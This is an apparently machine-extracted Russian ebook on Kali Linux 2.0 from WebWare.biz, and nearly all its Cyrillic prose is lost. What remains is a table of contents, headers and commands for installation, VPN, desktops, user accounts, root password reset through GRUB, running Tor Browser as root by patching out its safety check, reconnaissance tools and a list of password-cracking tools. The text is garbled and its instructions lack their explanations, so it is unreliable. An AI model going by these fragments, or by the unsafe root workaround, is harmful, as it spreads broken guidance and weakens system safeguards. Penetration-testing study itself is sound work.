Вы находитесь на странице: 1из 348

Kali Linux

.
, .

" (. )

." - WiKi

, ,
. ,
, .

:
WebWare.biz

2015
Kali Linux 2.0

1. Kali Linux
1. Kali Linux? 7
2. Kali Linux: 9

3. VirtualBox Kali Linux 22
2.0
4. Kali Linux 25
( )
5. 10 , 43
Kali Linux 2.0
6. VMware Kali 45
7. VPN Kali Linux 45
VPN
8. Kali Linux 52

9. Kali Linux 54
10. / ( ) Kali 63
Linux
11. root Kali Linux 66
12. GRUB Kali Linux 68
Windows 10
13. Tor Kali Linux 70
2. Kali Linux
14. Kali Linux. 1. 74

15. Kali Linux. 2. 81

16. 95
17. Offensive Security ( Kali 119
Linux)
3.
18. Kali Linux USB Wi-Fi 122
19. Wi-Fi (WPA/WPA2), pyrit cowpatty 129
Kali Linux
20. Wifi WPA/WPA2 Reaver 135
21. Reaver t6x 140

WebWare.biz 3
Kali Linux 2.0

Pixie Dust
22. WPA2/WPA Hashcat Kali Linux 145
( Wi-Fi )
23. Wifite Pixiewps 153
24. Wi-Fi : , Kali 155
Linux
25. Router Scan by StasM Kali Linux ( Wi-Fi 165
)
26. Wifi_Jammer Wifi_DoS WebSploit 168
27. - Wifi_Jammer: 172
Wi-Fi
28. - Wifi_DoS: Wi-Fi 176
4. -
29. - (DoS -) SlowHTTPTest Kali Linux: 179
slowloris, slow body slow read
30. - : DoS - Kali Linux GoldenEye 186
31. - Low Orbit Ion Cannon (LOIC) 195
32. - : DoS hping3 199
IP Kali Linux
5. -
33. WhatWeb: Kali Linux 203
34. SQL-: ( 207
1)
35. SQLMAP Kali Linux: - 219
SQL-
36. Firefox 232
37. WordPress: WPScanner Plecost 236
38. Plecost 1.0.1 240
WordPress
39. W3af Kali Linux 244
40. ZAProxy: - 248
41. Metasploit Framework Kali Linux 2.0 250
42. Metasploit Framework Kali Linux 1.1 256
43. DIRB: - 265
44. Kali Linux 271
6.

WebWare.biz 4
Kali Linux 2.0

45. OpenVAS 8.0 272


46. Armitage: 275
Kali Linux
47. Linux (rootkits) 283
rkhunter
48. Linux 286
49. Linux Malware Detect (LMD) Linux 292
50. Windows? 296
7. .
51. 299

52. NMAP Linux 301
53. Nmap 310
54. - WireShark ( 310
)
55. FTP-Map: 314
FTP-
56. ZMap IPv4 45 316

8. .
57. : , 319
,
58. PW-Inspector: 325
59. THC-Hydra: 326
( )
60. - Hydra ( 334
Hydra)
61. Crunch : 343

62. BruteX: 346

WebWare.biz 5
Kali Linux 2.0


Kali Linux .
WebWare.biz.
WebWare.biz : -
( ), .
, .
WebWare.biz , Kali Linux.
. .
Linux -
Linux, ,
, ,
Kali Linux.
.
-. , 30-50
, , . Kali
Linux - BackTrack
BackTrack Kali Linux.
.
. : ,
, .
,
WebWare.biz. , ,
, . ,
.
. ,
. , .
, ,
,
http://webware.biz/?page_id=27 . ,
, , http://webware.biz/?p=3327,
, .

WebWare.biz 6
Kali Linux 2.0

1. Kali Linux
1. Kali Linux?
Kali Linux Linux
.
Kali Linux
Kali BackTrack Linux www.backtrack-linux.org,
Debian.
, ,
Git VCS.
300 :
, BackTrack,
,
, .
: Kali Linux, ,
. ,
Kali Linux.
Git :

, ,
.
FHS : Kali , Filesystem
Hierarchy Standard, Linux
, , ..
: Kali Linux
,

USB
.
: ,
,
.
: Kali Linux
,

.
GPG : Kali
,
.
: , ,
, , Kali
,
, .

WebWare.biz 7
Kali Linux 2.0

: ,
,
Kali Linux ,
.
ARMEL ARMHF: ARM-
, ,
Kali ARM-
ARMEL ARMHF . Kali Linux ARM
, ARM
.
ARM-:
o rk3306 mk/ss808
o Raspberry Pi
o ODROID U2/X2
o Samsung Chromebook
Kali , ,
,
Linux.
Kali Linux Debian
Kali Linux
. , Kali Linux ,
:
single user, root access: , Kali Linux
single, root user.
: Kali Linux sysvinit hooks,
. hooks
Linux, ,
, ,
. , Bluetooth,
.
Linux : Kali Linux ,
.
Kali Linux ?
, , ,
Kali Linux. , Kali Linux

, , Linux.
, ,
, ,
.

WebWare.biz 8
Kali Linux 2.0

2. Kali Linux:

Wi-Fi,
USB Wi-Fi .
Kali Linux USB Wi-Fi .

Kali Linux 2.x Kali Linux 1.x


Kali Linux , Linux Debian.
, , ,
. ..
,
,
- . . Kali Linux
,
WebWare.biz ,
RSS-, e-mail
.
, Kali Linux
:

WebWare.biz 9
Kali Linux 2.0

, Kali Linux 64 bit ISO


Kali Linux 32 bit ISO. ,
( ).
- , Kali Linux
(
, ,
.
Kali Linux Live-
( Live-
). Kali Linux , . .
() (, ).
VirtualBox,
( ).
VirtualBox . ,
(Linux) (

). ( Debian,
. . Kali Linux ):

,
, .
, VirtualBox,
, VirtualBox :

WebWare.biz 10
Kali Linux 2.0


, (
Live-,
):

WebWare.biz 11
Kali Linux 2.0

.
. . .
, 30 , ,
30 , . . .
,
(, 2-3 ),
:

WebWare.biz 12
Kali Linux 2.0

,
, ,
. -
, , .
10 , , :

WebWare.biz 13
Kali Linux 2.0

, Kali Linux, kali-


linux-1.0.9a-amd64, , kali-linux-1.0.9a-
amd64.iso.
. -
, Kali Linux:

WebWare.biz 14
Kali Linux 2.0

Live- ( ),
. Install ():

, ,
.
:

WebWare.biz 15
Kali Linux 2.0

( , ):

WebWare.biz 16
Kali Linux 2.0

. .
( , Enter):

Enter:

. :
WebWare.biz 17
Kali Linux 2.0

, :

, :

WebWare.biz 18
Kali Linux 2.0

, . . Kali Linux
:

( , -
):
WebWare.biz 19
Kali Linux 2.0

.iso ,
:

WebWare.biz 20
Kali Linux 2.0

'root' :

Kali Linux

.
WebWare.biz 21
Kali Linux 2.0

3. VirtualBox
Kali Linux 2.0
Kali Linux VirtualBox,
.
VirtualBox 4.2.xx ,
,
, .
VirtualBox Kali Linux
VirtualBox
, .
, .
Kali Linux,
Linux.
1| apt-get update && apt-get install -y linux-headers-$(uname -r)
, CD-ROM
.
. ISO CD
Kali Linux.
CD, .
, CD-ROM
.
. ISO CD
WebWare.biz 22
Kali Linux 2.0

Kali Linux.
CD, .

VboxLinuxAdditions.run CD-ROM
. ,
.
1| cp /media/cdrom/VBoxLinuxAdditions.run /root/
2| chmod 755 /root/VBoxLinuxAdditions.run
3| cd /root
4| ./VBoxLinuxAdditions.run

WebWare.biz 23
Kali Linux 2.0

Kali Linux
. ,
.

,
Kali Linux VirtualBox VirtualBox.
VirtualBox Kali Linux
. .
, , -
.

WebWare.biz 24
Kali Linux 2.0

media.
.

4. Kali Linux
( )
Linux
Kali Linux :
( ,
Wi-Fi );
(
; )
GPU Wi-Fi-
Wi-Fi-;
, ;
;
Kali Linux .
. ,
(). ,
, Windows
. ,
(). (

WebWare.biz 25
Kali Linux 2.0

), ( ) , ,
. , , .
, WebWare.biz Kali Linux Live USB.
Live. .. Live .
Live , . ..
.
, ,
(Persistence) Kali
Live USB. Linux,
.
, Kali USB
.
, , Kali Linux
.
,
. ,
, .
, Linux! ..
Mint, Ubuntu -,
.
Linux USB--

VirtualBox.
. Linux
, . , ,
. , , VirtualBox.
. ,
, Linux. , , , , Debian (64 bit).
64- ,
.

. , , 1 .
.

WebWare.biz 26
Kali Linux 2.0

, :

, .
.
. Kali Linux .
, !

WebWare.biz 27
Kali Linux 2.0

. Kali Linux :

WebWare.biz 28
Kali Linux 2.0

, (
). . , Kali Linux
. ,
. , USB-
( ) .
Linux Mint. :
, VirtualBox . ..
. :
USB 3 USB 2. VirtualBox 5
USB 3 ( ). ,
.
( - ) Linux
. ,
. .. - , -.
, ,
, :

WebWare.biz 29
Kali Linux 2.0

Kali Graphical install.

. , .
,
Kali.

WebWare.biz 30
Kali Linux 2.0

WebWare.biz 31
Kali Linux 2.0

WebWare.biz 32
Kali Linux 2.0

WebWare.biz 33
Kali Linux 2.0

. USB 3,
.

WebWare.biz 34
Kali Linux 2.0

- :

WebWare.biz 35
Kali Linux 2.0

.
, .
. .
Kali Linux
Windows , ,
. Delete Esc
(
). , .
, . ,
USB 3, .
USB 2.
Windows ( ),
Microsoft UEFI.
, ( ,
?).
(
):
1| shutdown.exe /r /o
,
. :

WebWare.biz 36
Kali Linux 2.0

UEFI:

WebWare.biz 37
Kali Linux 2.0

, -.
, . Boot,
Boot Option Priorities, :

WebWare.biz 38
Kali Linux 2.0

.
Secure Boot (Disable):

OS Mode Selection. CMS and UEFI OS.


CMS OS, Windows .

WebWare.biz 39
Kali Linux 2.0

Fast BIOS Mode (Disable).


, USB :

WebWare.biz 40
Kali Linux 2.0

!
. F2. Delete.
.
, .
. ,
Esc F*.
Boot Option Priorities. .
, Windows Boot
Manager, : ,
Linux . , Windows
!

WebWare.biz 41
Kali Linux 2.0

VirtualBox .

Live- Linux CD (DVD)-, ,
. :
CD (DVD)- ( );
.
( Linux
), (
).
, . .
VirtualBox, :
Kali Linux Live USB
(Persistence) Kali Live
USB
Kali,
16 . 32
,
. , .
eBay.com.

WebWare.biz 42
Kali Linux 2.0

5. 10 ,
Kali Linux 2.0
: https://www.offensive-security.com/kali-linux/top-10-post-install-tips/
Kali 2.0
, , ,
. ,
, 10 :

, .
.
. , .
https://www.youtube.com/watch?v=drAQVPXuXu4
SSH Kali 2.0
Kali Linux 2.0 Debian SSH,
root key ( Jessie).
1| root@kali:~# grep Root /etc/ssh/sshd_config
2| PermitRootLogin without-password
PermitRootLogin
yes SSH,
. SSH
authorized_keys.
Nvidia
NVIDIA,
NVIDIA Kali 2.0.
VMWare Virtualbox,


VMWare (Workstation
Fusion), VirtualBox.
Gnome
,
ISO.
Gnome:
https://www.youtube.com/watch?v=Ju9qdYGc9rk
Kali 2.0
- ,
Kali, sources.list
. ,
, .
WebWare.biz 43
Kali Linux 2.0

,
sources.list. kali-dev, kali-rolling -
Kali, .
** ,
/etc/apt/sources.list.d/ .
-,
root
, Kali ,
root. ,
- Kali ,
( mial
):
1| root@kali:~# useradd -m mial -G sudo -s /bin/bash
2| root@kali:~# passwd mial
3| Enter new UNIX password:
4| Retype new UNIX password:
5| passwd: password updated successfully
6| root@kali:~#

Flash
.
Kali
Debian 4 . ,
Kali .
, :
1| apt-get update && apt-get dist-upgrade

FHS
Kali
, . Kali
, ,
( ).
Kali .
, .
Kali ,
FHS, . .
apt.

WebWare.biz 44
Kali Linux 2.0

6. VMware Kali
( Kali Linux 1.1.0 Kali Linux 2.0)
VMware,
VMware,
VMware
Kali. opt open-vm-toolbox,
VMware.
open-vm-tools
, ,
VMware Kali VMware.
1| apt-get install open-vm-toolbox

VMware Kali
vmware-tools ,
. vmware-tool
.
1| cd ~
2| apt-get install git gcc make linux-headers-$(uname -r)
3| git clone https://github.com/rasa/vmware-tools-patches.git
4| cd vmware-tools-patches

ISO VMware, Install VMware Tools


( VMware) . ISO
VMware ,
, :
1| cd ~/vmware-tools-patches
2| cp /media/cdrom/VMwareTools-9.9.0-2304977.tar.gz downloads/
3| ./untar-and-patch-and-compile.sh

7. VPN Kali Linux


VPN
( Kali 2.0 Kali 1.x)
VPN
VPN Kali Linux
(VPN) ,
.
,
WebWare.biz 45
Kali Linux 2.0

, ,
. VPN
,
. Kali Linux, ,
VPN , . . .
,
VPN VPN Kali
Linux.
,
(, ),

(, ,
,
). .
VPN
. VPN
, . VPN
-
.
VPN ?
11 , VPN.
1. VPN IP .
2. ( WiFi)

3. .
4. .
5. !
6. ( Youtube, NetFlix
BBC Player ..)
7. .
8. /VOIP .
9. , .
10. .
11. .
, VPN .
, , , ,
, ( !),
(, Alexa, Google Toolbar . .).
VPN Kali Linux 2.0
1| aptitude -r install network-manager-openvpn-gnome network-manager-pptp network-
manager-pptp-gnome strongswan-nm network-manager-vpnc network-manager-vpnc-
gnome

WebWare.biz 46
Kali Linux 2.0

VPN Wired:

WebWare.biz 47
Kali Linux 2.0

(+) :

VPN:

WebWare.biz 48
Kali Linux 2.0

VPN Kali Linux 1.x


VPN Kali Linux 1.x
, Kali Linux VPN . ,
, , , VPN,
- -, .
, .
,
.

,
.
WebWare.biz 49
Kali Linux 2.0

VPN Kali Linux 1.x


-, .
Kali Linux.
.
, , .
.
1| aptitude -r install network-manager-openvpn-gnome network-manager-pptp network-
manager-pptp-gnome network-manager-strongswan network-manager-vpnc network-
manager-vpnc-gnome

WebWare.biz 50
Kali Linux 2.0

, , aptitude of apt-get,
-r, Network-Manager.
aptitude -r install, , , ,
( , -
1969 kB, ).
, Network-Manager , aptitude .
, ?
, , ,
VPN .
, , , .
VPN Kali Linux (GNOME)
, , VPN.

,
VPN:

Kali Linux 4 VPN:


Cisco Compatible (vpnc)
IPsec/IKEv2 (strongswan)
OpenVPN
WebWare.biz 51
Kali Linux 2.0

Point-to-point Tunneling Protocol (PPTP)

VPN , VPN , VPN , ,


. VPN,
, , .
, , , , ,
. ., , ,
. ,
.

8. Kali Linux

(
) Kali.
,
. ,
1| cat /etc/apt/sources.list
:
1| #
2| # deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot amd64 LIVE/INSTALL Binary
20150312-17:50]/ kali contrib main non-free
3| #deb cdrom:[Debian GNU/Linux 7.0 _Kali_ -<span id="more-3630"></span> Official
Snapshot amd64 LIVE/INSTALL Binary 20150312-17:50]/ kali contrib main non-free
4| deb http://security.kali.org/ kali/updates main contrib non-free
5| deb-src http://security.kali.org/ kali/updates main contrib non-free
- , - .
, :
Kali 2.0
1| if cat /etc/apt/sources.list | grep -E "deb http://http.kali.org/kali sana main non-free
contrib" && cat /etc/apt/sources.list | grep -E "deb http://security.kali.org/kali-security/
sana/updates main contrib non-free"; then echo -e "\n\n "; else
echo -e "\n\n "; fi

Kali 1.x
1| if cat /etc/apt/sources.list | grep -E "deb http://http.kali.org/kali kali main non-free
contrib" && cat /etc/apt/sources.list | grep -E "deb http://security.kali.org/(|kali-security)
kali/updates main contrib non-free"; then echo -e "\n\n "; else
echo -e "\n\n "; fi

WebWare.biz 52
Kali Linux 2.0

. , :

:
Kali 2.0
1| echo -e "deb http://http.kali.org/kali sana main non-free contrib\ndeb
http://security.kali.org/kali-security/ sana/updates main contrib non-free" >
/etc/apt/sources.list

Kali 1.x
1| echo -e "deb http://http.kali.org/kali kali main non-free contrib\ndeb
http://security.kali.org/kali-security kali/updates main contrib non-free" >
/etc/apt/sources.list
, sources.list (
). .. - ,
. , .
,
Kali.
:

WebWare.biz 53
Kali Linux 2.0

:
1| root@WebWare-Kali:~# cat /etc/apt/sources.list
2| deb http://http.kali.org/kali kali main non-free contrib
3| deb http://security.kali.org/kali-security kali/updates main contrib non- free

.
, :
1| apt-get update

9. Kali Linux
GNOME 3 Kali 2.0?
! , . Kali Linux 2.0
GNOME 3. Linux, ,
, :
No, I want to tell you the story of how you can take back control of your
computer.
: , ,
.
, , , . ,
GNOME 3 . ,
Kali Linux 2.0
Kali Linux 2.0, .
, - GNOME 3 - Ubuntu Linux Mint. Kali Linux
2.0 ( ) .
Linux .
( )
Kali Linux. : Cinnamon,
Xfce, KDE, LXDE, GNOME, MATE.
,
.

. , ,
. . ))
:
.
() .ISO Kali Linux.
( ),
,
.
Kali Linux 2.0! Kali Linux 1.x , ,
, MATE (
WebWare.biz 54
Kali Linux 2.0

; , , -). Kali Linux 2.0


.

Linux: Cinnamon, Xfce, KDE, LXDE, GNOME, MATE
, , ,
.
. . Cinnamon.
KDE .
GNOME 2.
:
Cinnamon
, GNOME,
( Linux) ,
GNOME. Cinnamon MATE.
Linux Mint ?
MATE GNOME 2 . ..
GNOME 2, . Cinnamon, GNOME 2,
.

, .
, Cinnamon.
MATE
, MATE Cinnamon
GNOME 2.
KDE
.
: , . , ,
))
KDE , ( , )
.
Xfce
Xfce UNIX- .
,
,
, Xfce, .
LXDE
, LXDE ,
. LXDE
, .
,
/ .

WebWare.biz 55
Kali Linux 2.0

:
( Cinnamon),
. ,
:
1| /usr/share/backgrounds/

Kali Linux Cinnamon

Cinnamon Kali Linux:


1| apt-get install kali-defaults kali-root-login desktop-base cinnamon
Cinnamon Kali Linux:
1| apt-get remove cinnamon

WebWare.biz 56
Kali Linux 2.0

Kali Linux Xfce

XFCE Kali Linux.


,
goodies ().
1| apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-
goodies
XFCE Kali Linux
XFCE,
1| apt-get remove xfce4 xfce4-places-plugin xfce4-goodies

WebWare.biz 57
Kali Linux 2.0

Kali Linux KDE

KDE Plasma Kali Linux:


1| apt-get install kali-defaults kali-root-login desktop-base kde-plasma-desktop
KDE Kali Linux:
1| apt-get install kali-defaults kali-root-login desktop-base kde-plasma-netbook
Debian Kali Linux:
1| apt-get install kali-defaults kali-root-login desktop-base kde-standard
KDE Full Install ( ) Kali Linux:
1| apt-get install kali-defaults kali-root-login desktop-base kde-full

WebWare.biz 58
Kali Linux 2.0

KDE Kali Linux:


1| apt-get remove kde-plasma-desktop kde-plasma-netbook kde-standard

Kali Linux LXDE

LXDE Kali Linux:


1| apt-get install lxde-core lxde kali-defaults kali-root-login desktop-base
LXDE Kali Linux:
1| apt-get remove lxde-core lxde

WebWare.biz 59
Kali Linux 2.0

Kali Linux GNOME

GNOME Kali Linux:

1| apt-get install gnome-core kali-defaults kali-root-login desktop-base

GNOME Kali Linux:

1| apt-get remove gnome-core

WebWare.biz 60
Kali Linux 2.0

Kali Linux MATE

MATE:
1| apt-get install kali-defaults kali-root-login desktop-base mate-core
() MATE
mate-core :
1| apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment
() MATE
.

WebWare.biz 61
Kali Linux 2.0

mate-core + mate-desktop-environment
:
1| apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment-extra
MATE Kali Linux
MATE, :
1| apt-get remove mate-core

Kali Linux
, ,
Kali Linux, .
, .
! ..
, .
.
.
1| update-alternatives --config x-session-manager

update-alternatives
update-alternatives , ,
.
Debian. ,
Perl;
Debian update-dependencies. (man)
man Debian.
, ,
. ,
.
, ,
.
, ,
.
.
, .
,
. ,
ed nvi,
/usr/bin/editor /usr/bin/nvi.
,
/usr/bin/ed, ,
.
.
, , ,
, . ,
WebWare.biz 62
Kali Linux 2.0

/etc,
FHS (q.v.).
.
, .
config,
. ,
,
auto. :
1| man update-alternatives

10. / ( )
Kali Linux
Linux
Linux -
, .
, , ,
sudo su . Kali Linux
, .
,
Kali Linux ,
.
,
. ,
(, ) Kali Linux. Kali Linux
Debian Debian (Ubuntu,
Linux Mint).
, :
1. (. .
Could not update .ICEauthority var/lib/gdm3/.ICEauthority
ICEauthority
).
2. sudo,
. lpadmin,
Canon, HP .
3. chsh bash. , ,
Bourne Shell (sh), Bourne-Again Shell (bash), C Shell (csh) Korn shell (ksh) ...
4. , .
5. sudo,
.
6. .

WebWare.biz 63
Kali Linux 2.0

Kali:
Kali
1. Google Chrome
2. Gnome (
gnome-system-tools)
3. Kali
.
.
Kali Linux:

( mial ):
1| useradd -m mial
(: -m ,
/home/_)

1| passwd mial
.
sudo (
, ,
..)
1| usermod -a -G sudo mial
(: -a , G /)
bash
1| chsh -s /bin/bash mial
(: chsh shell, -s ,
, /bin/bash)
, .

(mial)

, , .

1| whoami
mial@kali.
, .
,
:
1| groups

WebWare.biz 64
Kali Linux 2.0

.
mial ( ) sudo. ,

.
!
1| sudo su
.
root@kali mial@kali. ,
Kali , .
whoami
1| whoami
. ?
Kali Linux:
. :
1| userdel -r mial
(: -r mial)
mial .
userdel: user mial is currently used by process 25274.
.. ID 25274 mial. ( , Gnomekeyring,
sudo su . GnomeKeyring
Debian,
. , Gnome-
Keyring. gnomekeyring
). , . .
.

,
mial.
1| kill -9 25274
.
(: , ,
)
.
1| userdel r mial
userdel: mial (/var/mail/mial) .
(: -r mial)
? ,
mial.

WebWare.biz 65
Kali Linux 2.0

, mial ,
home
1| ls /home
, mial .
?
1| su mial
, mial .

11. root Kali Linux


root Kali Linux
, .
, live-, ARM- Kali
Linux. , :
1| toor

Kali Linux
.
, Linux
.
toor , ( ) .
, :

'e', . ,
1| linux /boot/vmlinuz-3.18 ...
( ,
2 ):
1| single init=/bin/bash

WebWare.biz 66
Kali Linux 2.0

F10 .
:

- (
):
1| mount -rw -o remount /
:
1| passwd root

WebWare.biz 67
Kali Linux 2.0

, :
1| shutdown -h now
Kali Linux, .
GRUB.

12. GRUB Kali Linux


Windows 10
: AndreyKravets,
http://andrey.lviv.ua/blog/repair-grub-kali-linux-with-windows-10,
http://andrey.lviv.ua.
: +AndreyKravets.
! ,
GRUB Windows 10 Kali Linux.
,
. GRUB Ubuntu,
Kali. -
.
- ( )
, .
. ,
Linux, .
Linux- , Windows
.
Windows 8.1 Kali Linux.
, Windows 10 (-

WebWare.biz 68
Kali Linux 2.0

) . 8.1 ,
, GRUB. Kali Linux ,
.
.
LiveCD ,
, usb .
, . Linux,
:
1| fdisk -l
. -
:
1| /dev/sda1 29 8369 66999082+ 83 Linux
2| /dev/sda2 * 8370 13995 45190845 7 HPFS/NTFS
3| /dev/sda3 13996 14593 4803435 5 Extended
, Linux / dev / sda1
(
Linux, sda1):
1| mount /dev/sda1 /mnt
2| mount --bind /dev /mnt/dev
3| mount --bind /dev/pts /mnt/dev/pts
4| mount --bind /proc /mnt/proc
5| mount --bind /sys /mnt/sys
6| chroot /mnt
7| grub-install /dev/sda
8| update-grub
9| exit
10| umount /mnt/dev/pts
11| umount /mnt/dev
12| umount /mnt/proc
13| umount /mnt/sys
14| umount /mnt
! reboot .
Windows ( ), root-
:
1| os-prober
2| update-grub

WebWare.biz 69
Kali Linux 2.0

13.
Tor Kali Linux
Tor (The Onion Router)
" ". ,
,
. ,
. ( )
, , "Tor",
"TOR". .
Tor ,
, ,
, ,
. ( )
, Tor ,
, . (
Tor .) -

. , ( 10
) (
).
, , .. ,
. 2011 Tor
2500 , .
SOCKS.
.
: ,
, , . ,
"" , .
.
(Onion). .
Tor
Electronic Frontier Foundation,
.
Tor,
.
Tor
.
, VPN,
, .
Tor -,
TCP.
, , Tor.
Tor () ,
,
WebWare.biz 70
Kali Linux 2.0

. Tor
.
Tor (
) - ! ,
(),
. , ,
.
100%.
Tor
(..) .
Tor ,
. ..
.
Tor () ,
Tor.
Tor
.
2002 . ,
,
,
. (
2009 .)
"" Tor Browser Kali Linux
Tor Linux,
. Kali Linux
( Tor - , Kali Linux
). ,
:
64-
1| (t=`curl -s https://www.torproject.org/download/download-easy.html.en#linux | grep -E -
o '/dist/torbrowser/[0-9]{1}.[0-9]{1}.[0-9]{1}/tor-browser-linux64-[0-9]{1}.[0-9]{1}.[0-
9]{1}_' | head -1`; t="https://www.torproject.org"$t"ru.tar.xz"; wget $t) && tar -xvf tor-
browser-linux64-* && sed -i 's/u`" -eq 0/u`" -eq 1/' ./tor-browser_ru/Browser/start-tor-
browser && chown -R root ./tor-browser_ru/* && ./tor-browser_ru/Browser/start-tor-
browser

32-
1| (t=`curl -s https://www.torproject.org/download/download-easy.html.en#linux | grep -E -
o '/dist/torbrowser/[0-9]{1}.[0-9]{1}.[0-9]{1}/tor-browser-linux32-[0-9]{1}.[0-9]{1}.[0-
9]{1}_' | head -1`; t="https://www.torproject.org"$t"ru.tar.xz"; wget $t) && tar -xvf tor-
browser-linux32-* && sed -i 's/u`" -eq 0/u`" -eq 1/' ./tor-browser_ru/Browser/start-tor-
browser && chown -R root ./tor-browser_ru/* && ./tor-browser_ru/Browser/start-tor-
browser

WebWare.biz 71
Kali Linux 2.0

:
Tor


,

Tor
- ,
.
. ,
start-tor-browser.
https://www.torproject.org/download/download-easy.html.en#linux,
, 32- 64- (
tor-browser-linux64-4.5.3_ru.tar.xz), .
:
1| cd Desktop
2| tor-browser-linux64-4.5.3_ru.tar.xz

tor-browser_ru.
start-tor-browser Leafpad.
"The Tor Browser Bundle should not be run as root. Exiting.", :
1| if [ "`id -u`" -eq 0 ]; then

0 1, :
1| if [ "`id -u`" -eq 1 ]; then

.
:
1| cd tor-browser_ru
2| chown -R root *
3| ./Browser/start-tor-browser

WebWare.biz 72
Kali Linux 2.0

Tor
, Tor
, IP-
. .
IP- ,
Tor. (, http://2ip.ru Tor
https://check.torproject.org . .)
, :
1| wget -q -O - ip.appspot.com
IP- .
Tor .
, IP ,
. . ., ,
, .
:
,
Java- http://www.stilllistener.addr.com/checkpoint1/index.shtml
IP- ( IP) ,
http://www.anonymize.net/current-ID.phtml
http://2ip.ru/ .
http://smart-ip.net/ HTTP SOCKS Proxy
http://leader.ru/secure/who.html
. Whois!
http://ip-whois.net/
http://clientn.free-hideip.com/map/whatismyip.php
http://smart-ip.net/tools/geoip

WebWare.biz 73
Kali Linux 2.0

IP-, Tor
.

2. Kali Linux
14. Kali Linux 1.1.0.

Kali Linux ,
, ,
.
Information Gathering


.
.
Vulnerability Analysis

WebWare.biz 74
Kali Linux 2.0

.
, ,
( Information Gathering).
Web Applications

-.
.
, - -,
. , -
.
Password Attacks

,
( )
.

WebWare.biz 75
Kali Linux 2.0

Wireless Attacks


. 802.11 ,
, aircrack, airmon .
, RFID
Bluetooth. ,
, Kali
.

Exploitation Tools

.
(Vulnerability
Assessment) .

WebWare.biz 76
Kali Linux 2.0

Sniffing and Spoofing

,
, (spoofing).
VoIP

Maintaining Access

(Maintaining Access)
.

, ,
, , .

WebWare.biz 77
Kali Linux 2.0

Reverse Engineering

, , (debug) .
,
, , ,
.
, , ,
.
Stress Testing

(Stress Testing)
.
,

( ).
WebWare.biz 78
Kali Linux 2.0

Hardware Hacking

Android,
Android,

Forensics

(Forensics)
, .
WebWare.biz 79
Kali Linux 2.0

Reporting Tools

(Reporting tools) ,
.
System Services

Kali. BeEF,
Dradis, HTTP, Metasploit, MySQL, SSH.
WebWare.biz 80
Kali Linux 2.0

Kali Linux , , -,
Kali Linux,
(, ).

15. Kali Linux 1.1.0. 2.



. , -
. ,
, , ,
-, (
. .), .
, ! Kali Linux
, .
1. HTTrack -
- . ,
PHP . ,
. ,
.
Kali Linux, ,
:
1| apt-get install httrack

, , ,
HTTrack:
1| mkdir webware.biz
2| cd / webware.biz
3| httrack

WebWare.biz 81
Kali Linux 2.0

, , URL ( )
, WebWare.biz ,
:

1| 1. ()
2| 2. ()
3| 3.
4| 4. URL
5| 5. URL ( )
6| 0.
. , ,
, (*),
() , ,
, :

WebWare.biz 82
Kali Linux 2.0

HTTrack ( ):

, ,
.

WebWare.biz 83
Kali Linux 2.0

2. fping Nmap
ping, , . ,
ICMP . fping
.
IP
ICMP.

1| fping-asg network/host bits


2| fping -asg 10.0.1.0/24
-a IP , -s
, -g fping , ,
,
, .
Nmap .

WebWare.biz 84
Kali Linux 2.0

3. Dig DNS
:
dig <_>
:
1| dig webware.biz

DNS ( WebWare.biz
, ):
1| dig -t ns webware.biz

WebWare.biz 85
Kali Linux 2.0

4. Fierce
, , WebWare.biz mail.webware.biz,
cloud.webware.biz, th.webware.biz ..
( ):
1| fierce -dns webware.biz
zone transfer , .

5. Maltego
: Information Gathering| DNS Analysis| Maltego
Maltego , Kali
Paterva. ,

. :

WebWare.biz 86
Kali Linux 2.0

, , .

WebWare.biz 87
Kali Linux 2.0

WebWare.biz 88
Kali Linux 2.0

6. Nmap
Nmap . Nmap
, , ,
.
, ,
.
Nmap ,
.
Kali Zenmap. Zenmap Nmap
.
Zenmap ,
.
Zenmap,

WebWare.biz 89
Kali Linux 2.0

Kali Linux | Information Gathering | Network Scanners | zenmap


,
.

WebWare.biz 90
Kali Linux 2.0

WebWare.biz 91
Kali Linux 2.0

7. Metagoofil
!
, , , GPS
, ,
- . ,
, .
Metagoofil , :

WebWare.biz 92
Kali Linux 2.0

1| -d
2| -t (pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx)
3| -l ( 200)
4| -h ( "yes"
)
5| -n
6| -o ( )
7| -f ,

:
1| metagoofil -d webware.biz -t doc,pdf -l 200 -n 50 -o applefiles -f results.htm
: ,
, , .
.
:

WebWare.biz 93
Kali Linux 2.0

WebWare.biz 94
Kali Linux 2.0

,
. , Information Gathering, ,
. , , .

16.
:
,
.
: https://n0where.net/best-hacking-tools/

WebWare.biz 95
Kali Linux 2.0

Cain & Abel


Microsoft.
Cain & Abel

.

CacheDump, GPL, ,
CacheDump :
MSCASH.

John the Ripper ,


John the Ripper Unix ( 11
), Windows, DOS, BeOS OpenVMS.

GUI ( ) John the Ripper. FSCrack


FSCrack "" John the Ripper (JtR), .. (GUI)
JtR.

,
.
Hydra
,
.

keimpx ,
Apache License 1.1.
keimpx

SMB.

Medusa , ,
Medusa - . ,
.

Ncrack
.
Ncrack

.

Ophcrack Windows,
Ophcrack .
, .

WebWare.biz 96
Kali Linux 2.0

RainbowCrack
RainbowCrack
Philippe Oechslin. .

phrasen|drescher (p|d)
.
phrasen|drescher
, API
.

LCP
LCP
Windows NT/2000/XP/2003.

Crunch ,

Crunch
. crunch
.

, .
fcrackzip . zip,
Fcrackzip
. Fcrackzip
zip.

EnumIAX -
Inter Asterisk Exchange 2 (IAX2). enumIAX
Enumiax
:
.

wyd.pl : 1.
,
Wyd . 2. -

.

Bruter Win32.

Bruter
. Bruter ,
.

SSH .
The ssh
, , ,
bruteforcer
, .

Lodowep
Lodowep - Lotus Domino.
, .

WebWare.biz 97
Kali Linux 2.0

SSHatter - ,
SSH.
SSHatter

.

Amap ,
,
Amap
.
.

Dr.Morena
Dr.Morena .
.

Firewalk ,
, ()
Firewalk IP .
Firewalk TCP UDP TTL
, .

Netcat ,
, TCP/IP.
Netcat "" ,

.

Ike-scan ,
IKE ,
Ike Scan
IPSec VPN. Linux, Unix,
MacOS Windows GPL.

Nmap (Network Mapper " ")



Nmap .
,
.

Zenmap (GUI) Nmap


Zenmap Security Scanner. (Linux, Windows, Mac OS
X, BSD ..).

WebWare.biz 98
Kali Linux 2.0

onesixtyone SNMP,
Onesixtyone .
B 13 .

TCP, , . SuperScan 4
SuperScan 4 SuperScan
Windows SuperScan

AutoScan-Network (
).
